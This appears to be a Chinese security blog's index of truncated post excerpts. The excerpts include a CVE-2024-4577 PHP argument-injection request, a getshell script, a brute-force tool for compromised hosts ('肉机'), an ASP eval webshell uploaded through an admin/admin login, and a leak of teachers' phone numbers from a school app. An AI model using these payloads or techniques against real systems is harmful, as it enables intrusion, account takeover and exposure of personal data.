摘要:
学习了JWT(json web token),下边是笔记👇 0x01 原理 先挂一个加解密jwt的站: https://www.bejson.com/jwt/ JWT就是经过对称加密后的json ,密文前两个部分一般以 ”eyJ” 开头.整体分为首部(header) 载荷(payload) 密钥( 阅读全文
摘要:
参考:https://www.ddosi.org/cve-2024-4577/ http包👇 POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 Host: xxx.xx 阅读全文
摘要:
https://www.techrepublic.com/article/how-to-install-the-new-kali-linux-snapshot-tool-unkaputtbar/ 阅读全文
摘要:
声明:工具仅用于技术交流,请勿违法 '''EXP : getshell use pikachu''' import requests ###############👇 path=r'D:\phpstudy_pro\WWW\UPLOAD\py\rouji\pikachu-data.txt' #地址列 阅读全文
摘要:
声明:工具仅用于技术交流,请勿违法 如下 # -*- coding: utf-8 -*- ''' 肉机爆破密码脚本 由于是面向肉机的脚本,所以牺牲了一些速度,增加了准确性 程序挂肉机上然后去睡觉等结果嘛 从这里复制了代码:https://blog.csdn.net/tempulcc/article/ 阅读全文
摘要:
原理差不多就是把网站源代码下载下来,然后再源代码里用正则识别出url,再对url进行请求,得到响应码和网页标题 使用截图: github链接: **https://github.com/sesmof/url-fucker ** 第一次写工具,多多包涵 2024.4.22 增加了多线程功能和扫子域名功 阅读全文
摘要:
import os try: os.system('') # 开启windows CMD的ANSI转义序列支持 except: pass class colors(str): def TOred(st): return '\033[31m'+st+'\033[0m' def TOgreen(st): 阅读全文
摘要:
点开burpsuite后点右上角的齿轮,在弹出的新窗口的搜索框搜索'theme',然后点'dark'. 具体如图 成了 PS:我在网上搜burp改暗色主题,全是一大堆要么一上来吹水,要么得下插件的麻烦的教程,我跟着教程搞了一会儿才发现burp自带个暗色主题.于是写下这篇随笔. 阅读全文
摘要:
0x01 教师手机号泄露 打开智慧校园小程序 点进教师登录后发现,输入我老师名字后会显示尾号 抓包,在response中得到完整的手机号 手机注册那里填入抓到的手机号,便可以发短信验证码(填别的手机号会被前端的验证拦截并显示'该手机号不对,清核对信息',但验证是前端的[前端就是通过该response 阅读全文
摘要:
哥斯拉由java编写,可以在linux上使用.个人认为比冰蝎好用,用冰蝎连不上这个靶场,但是哥斯拉可以连的上. github搜哥斯拉就能下载 首先登陆后台,弱口令 admin admin 点击添加文章,尝试上传一句话木马(一句话木马可以点击哥斯拉的生成) webshell.asp <%eval re 阅读全文